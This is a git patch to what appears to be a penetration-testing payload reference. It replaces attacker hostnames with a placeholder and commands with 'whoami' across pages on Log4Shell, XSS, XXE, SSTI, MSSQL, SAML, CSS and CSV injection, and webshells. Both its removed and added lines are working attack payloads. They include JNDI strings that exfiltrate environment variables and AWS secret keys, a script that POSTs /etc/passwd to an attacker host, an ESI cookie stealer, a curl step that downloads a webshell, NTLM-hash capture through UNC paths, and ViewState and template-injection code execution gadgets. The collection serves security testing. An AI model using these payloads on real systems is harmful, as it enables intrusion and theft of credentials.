From d4e6eda4ad18ee84ce61fcea4e879ec38685763e Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Wed, 22 Apr 2026 15:03:31 +0200
Subject: [PATCH] Normalize commands, callbacks and references

---
 API Key Leaks/IIS-Machine-Keys.md             | 14 +++---
 Account Takeover/README.md                    | 12 ++---
 CONTRIBUTING.md                               |  2 +-
 CSS Injection/README.md                       |  8 ++--
 CSV Injection/README.md                       |  2 +-
 CVE Exploits/Log4Shell.md                     | 48 +++++++++----------
 Command Injection/README.md                   |  2 +-
 Headless Browser/README.md                    |  4 +-
 SAML Injection/README.md                      |  2 +-
 SQL Injection/MSSQL Injection.md              | 36 +++++++-------
 Server Side Include Injection/README.md       |  8 ++--
 .../SSRF-Advanced-Exploitation.md             |  2 +-
 Server Side Template Injection/Java.md        | 10 ++--
 Upload Insecure Files/README.md               |  8 ++--
 XSS Injection/4 - CSP Bypass.md               | 10 ++--
 XSS Injection/README.md                       | 20 ++++----
 XXE Injection/README.md                       | 40 ++++++++--------
 17 files changed, 114 insertions(+), 114 deletions(-)

diff --git a/API Key Leaks/IIS-Machine-Keys.md b/API Key Leaks/IIS-Machine-Keys.md
index 8210e85..2898b21 100644
--- a/API Key Leaks/IIS-Machine-Keys.md	
+++ b/API Key Leaks/IIS-Machine-Keys.md	
@@ -98,8 +98,8 @@ Try multiple machine keys from known products, Microsoft documentation, or other
     python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -r
     python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -mrd 5
     python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -u http://update.microsoft.com/
-    python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -u http://192.168.6.22:8080/
-    python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -mkf ./crapsecrets/resources/aspnet_machinekeys.txt -u http://192.168.6.22:8080/a1/b/c1/
+    python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -u http://10.10.10.10:8080/
+    python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -mkf ./crapsecrets/resources/aspnet_machinekeys.txt -u http://10.10.10.10:8080/a1/b/c1/
     ```
 
 * [NotSoSecure/Blacklist3r](https://github.com/NotSoSecure/Blacklist3r)
@@ -143,7 +143,7 @@ First you need to decode the Viewstate to know if the MAC and the encryption are
 ### MAC Is Not Enabled
 
 ```ps1
-ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/:UserName"
+ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "cmd /c whoami"
 ```
 
 ### MAC Is Enabled And Encryption Is Disabled
@@ -159,8 +159,8 @@ ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "power
 * Then generate a ViewState using [pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net), both `TextFormattingRunProperties` and `TypeConfuseDelegate` gadgets can be used.
 
     ```ps1
-    .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
-    .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "powershell.exe -c nslookup http://attacker.com" --generator=3E92B2D6 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
+    .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c whoami" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
+    .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd /c whoami" --generator=3E92B2D6 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
 
     # --generator = `__VIEWSTATEGENERATOR` parameter value
     # --validationkey = validation key from the previous command
@@ -175,13 +175,13 @@ If the `__VIEWSTATEGENERATOR` is missing but the application uses .NET Framework
 * **.NET Framework < 4.5**, ASP.NET always accepts an unencrypted `__VIEWSTATE` if you remove the `__VIEWSTATEENCRYPTED` parameter from the request
 
     ```ps1
-    .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "echo 123 > c:\windows\temp\test.txt" --apppath="/testaspx/" --islegacy --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" --isdebug
+    .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd /c whoami" --apppath="/testaspx/" --islegacy --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" --isdebug
     ```
 
 * **.NET Framework > 4.5**, the machineKey has the property: `compatibilityMode="Framework45"`
 
     ```ps1
-    .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/somepath/testaspx/test.aspx" --apppath="/testaspx/" --decryptionalg="AES" --decryptionkey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" --validationalg="HMACSHA256" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0"
+    .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c whoami" --path="/somepath/testaspx/test.aspx" --apppath="/testaspx/" --decryptionalg="AES" --decryptionkey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" --validationalg="HMACSHA256" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0"
     ```
 
 ## Edit Cookies With The Machine Key
diff --git a/Account Takeover/README.md b/Account Takeover/README.md
index bc4810b..5b3dddd 100644
--- a/Account Takeover/README.md	
+++ b/Account Takeover/README.md	
@@ -33,17 +33,17 @@
 ### Account Takeover Through Password Reset Poisoning
 
 1. Intercept the password reset request in Burp Suite
-2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
+2. Add or edit the following headers in Burp Suite : `Host: [ATTACKER.DOMAIN.TLD]`, `X-Forwarded-Host: [ATTACKER.DOMAIN.TLD]`
 3. Forward the request with the modified header
 
     ```http
     POST https://example.com/reset.php HTTP/1.1
     Accept: */*
     Content-Type: application/json
-    Host: attacker.com
+    Host: [ATTACKER.DOMAIN.TLD]
     ```
 
-4. Look for a password reset URL based on the *host header* like : `https://attacker.com/reset-password.php?token=TOKEN`
+4. Look for a password reset URL based on the *host header* like : `https://[ATTACKER.DOMAIN.TLD]/reset-password.php?token=TOKEN`
 
 ### Password Reset via Email Parameter
 
@@ -142,7 +142,7 @@ Refer to **HTTP Request Smuggling** vulnerability page.
 2. Craft a request which will overwrite the `POST / HTTP/1.1` with the following data:
 
     ```powershell
-    GET http://something.burpcollaborator.net  HTTP/1.1
+    GET http://[ATTACKER.DOMAIN.TLD]  HTTP/1.1
     X: 
     ```
 
@@ -157,7 +157,7 @@ Refer to **HTTP Request Smuggling** vulnerability page.
 
     0
 
-    GET http://something.burpcollaborator.net  HTTP/1.1
+    GET http://[ATTACKER.DOMAIN.TLD]  HTTP/1.1
     X: X
     ```
 
@@ -173,7 +173,7 @@ Hackerone reports exploiting this bug
 
 ### Account Takeover via JWT
 
-JSON Web Token might be used to authenticate an user.
+JSON Web Token might be used to authenticate a user.
 
 * Edit the JWT with another User ID / Email
 * Check for weak JWT signature
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index da5febe..5c40151 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -12,7 +12,7 @@ In order to provide the safest payloads for the community, the following rules m
 
 - Payloads must be sanitized
     - Use `id`, and `whoami`, for RCE Proof of Concepts
-    - Use `[REDACTED]` when the user has to replace a domain for a callback. E.g: XSSHunter, BurpCollaborator etc.
+    - Use `[ATTACKER.DOMAIN.TLD]` when the user has to replace a domain for a callback. E.g: XSSHunter, BurpCollaborator etc.
     - Use `10.10.10.10` and `10.10.10.11` when the payload require IP addresses
     - Use `Administrator` for privileged users and `User` for normal account
     - Use `P@ssw0rd`, `Password123`, `password` as default passwords for your examples
diff --git a/CSS Injection/README.md b/CSS Injection/README.md
index 898b58f..67a2d0c 100644
--- a/CSS Injection/README.md	
+++ b/CSS Injection/README.md	
@@ -47,7 +47,7 @@ input[value^="TOKEN_012"] {
 
 ```css
 input[name="pin"][value="1234"] {
-  background: url(https://attacker.com/log?pin=1234);
+  background: url(https://[ATTACKER.DOMAIN.TLD]/log?pin=1234);
 }
 ```
 
@@ -57,7 +57,7 @@ input[name="pin"][value="1234"] {
 
 ```css
 input[name="csrf-token"][value^="a"] + input {
-  background: url(https://example.com?q=a)
+  background: url(https://[ATTACKER.DOMAIN.TLD]/?q=a)
 }
 ```
 
@@ -76,8 +76,8 @@ div:has(input[value="1337"]) {
 This technique is known as **Blind CSS Exfiltration**. It relies on importing external stylesheets to trigger callbacks.
 
 ```html
-<style>@import url(http://attacker.com/staging?len=32);</style>
-<style>@import'//YOUR-PAYLOAD.oastify.com'</style>
+<style>@import url(http://[ATTACKER.DOMAIN.TLD]/staging?len=32);</style>
+<style>@import'//[ATTACKER.DOMAIN.TLD]'</style>
 ```
 
 Frames do not always need to be reloaded to reevaluate CSS. The `@import` rule allows for latency; the browser will process the import and apply the new styles.
diff --git a/CSV Injection/README.md b/CSV Injection/README.md
index f085834..51f80f2 100644
--- a/CSV Injection/README.md	
+++ b/CSV Injection/README.md	
@@ -76,7 +76,7 @@ Google Sheets allows some additional formulas that are able to fetch remote URLs
 So one can test blind formula injection or a potential for data exfiltration with:
 
 ```text
-=IMPORTXML("http://[REDACTED]/csv", "//a/@href")
+=IMPORTXML("http://[ATTACKER.DOMAIN.TLD]/csv", "//a/@href")
 ```
 
 Note: an alert will warn the user a formula is trying to contact an external resource and ask for authorization.
diff --git a/CVE Exploits/Log4Shell.md b/CVE Exploits/Log4Shell.md
index 4d9a9e5..31f48dc 100644
--- a/CVE Exploits/Log4Shell.md	
+++ b/CVE Exploits/Log4Shell.md	
@@ -45,13 +45,13 @@ bundle:config:db.password
 
 ## Scanning
 
-* [log4j-scan](https://github.com/fullhunt/log4j-scan)
+* [fullhunt/log4j-scan](https://github.com/fullhunt/log4j-scan) - Log4Shell scanning utility
 
     ```powershell
     usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing]
                         [--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST]
-    python3 log4j-scan.py -u http://127.0.0.1:8081 --run-all-test
-    python3 log4j-scan.py -u http://127.0.0.1:808 --waf-bypass
+    python3 log4j-scan.py -u http://10.10.10.10:8081 --run-all-test
+    python3 log4j-scan.py -u http://10.10.10.10:8080 --waf-bypass
     ```
 
 * [Nuclei Template](https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-44228.yaml)
@@ -59,16 +59,16 @@ bundle:config:db.password
 ## WAF Bypass
 
 ```powershell
-${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a}
+${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://10.10.10.10:1389/a}
 
 # using lower and upper
-${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc}
-${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc}
+${${lower:jndi}:${lower:rmi}://10.10.10.10:1389/poc}
+${j${loWer:Nd}i${uPper::}://10.10.10.10:1389/poc}
 ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
 
 # using env to create the letter
-${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
-${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
+${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//[ATTACKER.DOMAIN.TLD]/a}
+${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//[ATTACKER.DOMAIN.TLD]/a}
 ```
 
 ## Exploitation
@@ -76,32 +76,32 @@ ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attack
 ### Environment variables exfiltration
 
 ```powershell
-${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/
+${jndi:ldap://${env:USER}.${env:USERNAME}.[ATTACKER.DOMAIN.TLD]:1389/
 
 # AWS Access Key
-${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY}
+${jndi:ldap://${env:USER}.${env:USERNAME}.[ATTACKER.DOMAIN.TLD]:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY}
 ```
 
 ### Remote Command Execution
 
-* [rogue-jndi - @artsploit](https://github.com/artsploit/rogue-jndi)
+* [artsploit/rogue-jndi](https://github.com/artsploit/rogue-jndi) - Rogue JNDI LDAP/RMI exploitation server
 
     ```ps1
-    java -jar target/RogueJndi-1.1.jar --command "touch /tmp/toto" --hostname "192.168.1.21"
-    Mapping ldap://192.168.1.10:1389/ to artsploit.controllers.RemoteReference
-    Mapping ldap://192.168.1.10:1389/o=reference to artsploit.controllers.RemoteReference
-    Mapping ldap://192.168.1.10:1389/o=tomcat to artsploit.controllers.Tomcat
-    Mapping ldap://192.168.1.10:1389/o=groovy to artsploit.controllers.Groovy
-    Mapping ldap://192.168.1.10:1389/o=websphere1 to artsploit.controllers.WebSphere1
-    Mapping ldap://192.168.1.10:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
-    Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere2
-    Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
+    java -jar target/RogueJndi-1.1.jar --command "whoami" --hostname "10.10.10.10"
+    Mapping ldap://10.10.10.11:1389/ to artsploit.controllers.RemoteReference
+    Mapping ldap://10.10.10.11:1389/o=reference to artsploit.controllers.RemoteReference
+    Mapping ldap://10.10.10.11:1389/o=tomcat to artsploit.controllers.Tomcat
+    Mapping ldap://10.10.10.11:1389/o=groovy to artsploit.controllers.Groovy
+    Mapping ldap://10.10.10.11:1389/o=websphere1 to artsploit.controllers.WebSphere1
+    Mapping ldap://10.10.10.11:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
+    Mapping ldap://10.10.10.11:1389/o=websphere2 to artsploit.controllers.WebSphere2
+    Mapping ldap://10.10.10.11:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
     ```
 
-* [JNDI-Exploit-Kit - @pimps](https://github.com/pimps/JNDI-Exploit-Kit)
+* [pimps/JNDI-Exploit-Kit](https://github.com/pimps/JNDI-Exploit-Kit) - JNDI exploitation helper toolkit
 
 ## References
 
-* [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - December 12, 2021](https://web.archive.org/web/20240619113824/https://www.lunasec.io/docs/blog/log4j-zero-day/)
-* [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - December 14, 2021](https://web.archive.org/web/20240511165624/https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/)
-* [PSA: Log4Shell and the current state of JNDI injection - December 10, 2021](https://web.archive.org/web/20250903054130/https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/)
+* [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - LunaSec - December 12, 2021](https://web.archive.org/web/20240619113824/https://www.lunasec.io/docs/blog/log4j-zero-day/)
+* [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - LunaSec - December 14, 2021](https://web.archive.org/web/20240511165624/https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/)
+* [PSA: Log4Shell and the current state of JNDI injection - Moritz Bechler - December 10, 2021](https://web.archive.org/web/20250903054130/https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/)
diff --git a/Command Injection/README.md b/Command Injection/README.md
index 40394b2..f1d6062 100644
--- a/Command Injection/README.md	
+++ b/Command Injection/README.md	
@@ -134,7 +134,7 @@ Sometimes, direct command execution from the injection might not be possible, bu
 
     ```ps1
     # -o, --output <file>        Write to file instead of stdout
-    curl http://evil.attacker.com/ -o webshell.php
+    curl http://[ATTACKER.DOMAIN.TLD]/ -o webshell.php
     ```
 
 ### Inside A Command
diff --git a/Headless Browser/README.md b/Headless Browser/README.md
index b870500..3d7c688 100644
--- a/Headless Browser/README.md	
+++ b/Headless Browser/README.md	
@@ -53,7 +53,7 @@ Since the file access is allowed, an atacker can create and expose an HTML file
   async function getFlag(){
     response = await fetch("file:///etc/passwd");
     flag = await response.text();
-    fetch("https://attacker.com/", { method: "POST", body: flag})
+  fetch("https://[ATTACKER.DOMAIN.TLD]/", { method: "POST", body: flag})
   };
   getFlag();
 </script>
@@ -106,7 +106,7 @@ The Remote Debugging Port in a headless browser (like Headless Chrome or Chromiu
 * Connect and interact with the browser: `chrome://inspect/#devices`, `opera://inspect/#devices`
 * Kill the currently running browser and use the `--restore-last-session` to get access to the user's tabs
 * Data stored in the settings (username, passwords, token): `chrome://settings`
-* Port Scan: In a loop open `http://localhost:<port>/json/new?http://callback.example.com?port=<port>`
+* Port Scan: In a loop open `http://localhost:<port>/json/new?http://[ATTACKER.DOMAIN.TLD]/?port=<port>`
 * Leak UUID: Iframe: `http://127.0.0.1:<port>/json/version`
 
     ```json
diff --git a/SAML Injection/README.md b/SAML Injection/README.md
index 39d048d..f9ad7a9 100644
--- a/SAML Injection/README.md	
+++ b/SAML Injection/README.md	
@@ -174,7 +174,7 @@ Picture from [http://sso-attacks.org/XSLT_Attack](http://sso-attacks.org/XSLT_At
           <xsl:template match="doc">
             <xsl:variable name="file" select="unparsed-text('/etc/passwd')"/>
             <xsl:variable name="escaped" select="encode-for-uri($file)"/>
-            <xsl:variable name="attackerUrl" select="'http://attacker.com/'"/>
+            <xsl:variable name="attackerUrl" select="'http://[ATTACKER.DOMAIN.TLD]/'"/>
             <xsl:variable name="exploitUrl"select="concat($attackerUrl,$escaped)"/>
             <xsl:value-of select="unparsed-text($exploitUrl)"/>
           </xsl:template>
diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md
index e07e464..28bc4f3 100644
--- a/SQL Injection/MSSQL Injection.md	
+++ b/SQL Injection/MSSQL Injection.md	
@@ -304,14 +304,14 @@ Technique from [@ptswarm](https://twitter.com/ptswarm/status/1313476695295512578
 * **Permission**: Requires `VIEW SERVER STATE` permission on the server.
 
     ```powershell
-    1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.xem',null,null))
+    1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.[ATTACKER.DOMAIN.TLD]\1.xem',null,null))
     ```
 
 * **Permission**: Requires the `CONTROL SERVER` permission.
 
     ```powershell
-    1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\',default,default)))
-    1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.trc',default))
+    1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.[ATTACKER.DOMAIN.TLD]\',default,default)))
+    1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.[ATTACKER.DOMAIN.TLD]\1.trc',default))
     ```
 
 ### MSSQL UNC Path
@@ -319,21 +319,21 @@ Technique from [@ptswarm](https://twitter.com/ptswarm/status/1313476695295512578
 MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
 
 ```sql
-1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';-- 
+1'; use master; exec xp_dirtree '\\10.10.10.10\SHARE';-- 
 ```
 
 ```sql
-xp_dirtree '\\attackerip\file'
-xp_fileexist '\\attackerip\file'
-BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
-BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file'
-RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
-RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file'
-RESTORE HEADERONLY FROM DISK = '\\attackerip\file'
-RESTORE FILELISTONLY FROM DISK = '\\attackerip\file'
-RESTORE LABELONLY FROM DISK = '\\attackerip\file'
-RESTORE REWINDONLY FROM DISK = '\\attackerip\file'
-RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'
+xp_dirtree '\\10.10.10.10\file'
+xp_fileexist '\\10.10.10.10\file'
+BACKUP LOG [TESTING] TO DISK = '\\10.10.10.10\file'
+BACKUP DATABASE [TESTING] TO DISK = '\\10.10.10.10\file'
+RESTORE LOG [TESTING] FROM DISK = '\\10.10.10.10\file'
+RESTORE DATABASE [TESTING] FROM DISK = '\\10.10.10.10\file'
+RESTORE HEADERONLY FROM DISK = '\\10.10.10.10\file'
+RESTORE FILELISTONLY FROM DISK = '\\10.10.10.10\file'
+RESTORE LABELONLY FROM DISK = '\\10.10.10.10\file'
+RESTORE REWINDONLY FROM DISK = '\\10.10.10.10\file'
+RESTORE VERIFYONLY FROM DISK = '\\10.10.10.10\file'
 ```
 
 ## MSSQL Trusted Links
@@ -366,8 +366,8 @@ A trusted link in Microsoft SQL Server is a linked server relationship that allo
     select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')
 
     -- Create a SQL user and give sysadmin privileges
-    EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMAIN\SERVER1"') AT "DOMAIN\SERVER2"
-    EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMAIN\SERVER1"') AT "DOMAIN\SERVER2"
+    EXECUTE('EXECUTE(''CREATE LOGIN User WITH PASSWORD = ''''Password123'''' '') AT "DOMAIN\SQL01"') AT "DOMAIN\SQL02"
+    EXECUTE('EXECUTE(''sp_addsrvrolemember ''''User'''' , ''''sysadmin'''' '') AT "DOMAIN\SQL01"') AT "DOMAIN\SQL02"
     ```
 
 ## MSSQL Privileges
@@ -402,7 +402,7 @@ A trusted link in Microsoft SQL Server is a linked server relationship that allo
 ### MSSQL Make User DBA
 
 ```sql
-EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
+EXEC master.dbo.sp_addsrvrolemember 'User', 'sysadmin';
 ```
 
 ## MSSQL Database Credentials
diff --git a/Server Side Include Injection/README.md b/Server Side Include Injection/README.md
index fa45604..28f2872 100644
--- a/Server Side Include Injection/README.md	
+++ b/Server Side Include Injection/README.md	
@@ -48,12 +48,12 @@ Surrogate-Control: content="ESI/1.0"
 
 | Description             | Payload                                  |
 | ----------------------- | ---------------------------------------- |
-| Blind detection         | `<esi:include src=http://attacker.com>`  |
-| XSS                     | `<esi:include src=http://attacker.com/XSSPAYLOAD.html>` |
-| Cookie stealer          | `<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>` |
+| Blind detection         | `<esi:include src=http://[ATTACKER.DOMAIN.TLD]>`  |
+| XSS                     | `<esi:include src=http://[ATTACKER.DOMAIN.TLD]/XSSPAYLOAD.html>` |
+| Cookie stealer          | `<esi:include src=http://[ATTACKER.DOMAIN.TLD]/?cookie_stealer.php?=$(HTTP_COOKIE)>` |
 | Include a file          | `<esi:include src="supersecret.txt">` |
 | Display debug info      | `<esi:debug/>` |
-| Add header              | `<!--esi $add_header('Location','http://attacker.com') -->` |
+| Add header              | `<!--esi $add_header('Location','http://[ATTACKER.DOMAIN.TLD]') -->` |
 | Inline fragment         | `<esi:inline name="/attack.html" fetchable="yes"><script>prompt('XSS')</script></esi:inline>` |
 
 | Software | Includes | Vars | Cookies | Upstream Headers Required | Host Whitelist |
diff --git a/Server Side Request Forgery/SSRF-Advanced-Exploitation.md b/Server Side Request Forgery/SSRF-Advanced-Exploitation.md
index 1c3e331..a1bf35b 100644
--- a/Server Side Request Forgery/SSRF-Advanced-Exploitation.md	
+++ b/Server Side Request Forgery/SSRF-Advanced-Exploitation.md	
@@ -120,7 +120,7 @@ The following PHP script can be used to generate a page that will redirect to th
     $commands = array(
             'HELO victim.com',
             'MAIL FROM: <admin@victim.com>',
-            'RCPT To: <hacker@attacker.com>',
+            'RCPT To: <User@[ATTACKER.DOMAIN.TLD]>',
             'DATA',
             'Subject: @hacker!',
             'Hello Friend',
diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md
index 043f1f1..21466d5 100644
--- a/Server Side Template Injection/Java.md	
+++ b/Server Side Template Injection/Java.md	
@@ -397,7 +397,7 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex
 DNS lookup
 
 ```java
-${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","xxxxxxxxxxxxxx.burpcollaborator.net")}
+${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","[ATTACKER.DOMAIN.TLD]")}
 ```
 
 ### SpEL - Session Attributes
@@ -413,7 +413,7 @@ ${pageContext.request.getSession().setAttribute("admin",true)}
 - Method using `java.lang.Runtime` #1 - accessed with JavaClass
 
     ```java
-    ${T(java.lang.Runtime).getRuntime().exec("COMMAND_HERE")}
+    ${T(java.lang.Runtime).getRuntime().exec("whoami")}
     ```
 
 - Method using `java.lang.Runtime` #2
@@ -427,13 +427,13 @@ ${pageContext.request.getSession().setAttribute("admin",true)}
 - Method using `java.lang.Runtime` #3 - accessed with `invoke`
 
     ```java
-    ${''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(''.getClass().forName('java.lang.Runtime')).exec('COMMAND_HERE')}
+    ${''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(''.getClass().forName('java.lang.Runtime')).exec('whoami')}
     ```
 
 - Method using `java.lang.Runtime` #3 - accessed with `javax.script.ScriptEngineManager`
 
     ```java
-    ${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")"))}
+    ${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"whoami\\\")"))}
     ```
 
 - Method using `java.lang.ProcessBuilder`
@@ -442,7 +442,7 @@ ${pageContext.request.getSession().setAttribute("admin",true)}
     ${request.setAttribute("c","".getClass().forName("java.util.ArrayList").newInstance())}
     ${request.getAttribute("c").add("cmd.exe")}
     ${request.getAttribute("c").add("/k")}
-    ${request.getAttribute("c").add("ping x.x.x.x")}
+    ${request.getAttribute("c").add("whoami")}
     ${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())}
     ${request.getAttribute("a")}
     ```
diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md
index faa39dc..d0444ce 100644
--- a/Upload Insecure Files/README.md	
+++ b/Upload Insecure Files/README.md	
@@ -162,7 +162,7 @@ PHP web shells don't always have the `<?php` tag, here are some alternatives:
 * The `<?=` is shorthand syntax in PHP for outputting values. It is equivalent to using `<?php echo`.
 
     ```php
-    <?=`$_GET[0]`?>
+    <?=`id`?>
     ```
 
 ### Filename Vulnerabilities
@@ -244,11 +244,11 @@ Example of a malicious `uwsgi.ini` file:
 ; read from a symbol
 foo = @(sym://uwsgi_funny_function)
 ; read from binary appended data
-bar = @(data://[REDACTED])
+bar = @(data://[ATTACKER.DOMAIN.TLD])
 ; read from http
-test = @(http://[REDACTED])
+test = @(http://[ATTACKER.DOMAIN.TLD])
 ; read from a file descriptor
-content = @(fd://[REDACTED])
+content = @(fd://[ATTACKER.DOMAIN.TLD])
 ; read from a process stdout
 body = @(exec://whoami)
 ; call a function returning a char *
diff --git a/XSS Injection/4 - CSP Bypass.md b/XSS Injection/4 - CSP Bypass.md
index 84d6e9a..79e9306 100644
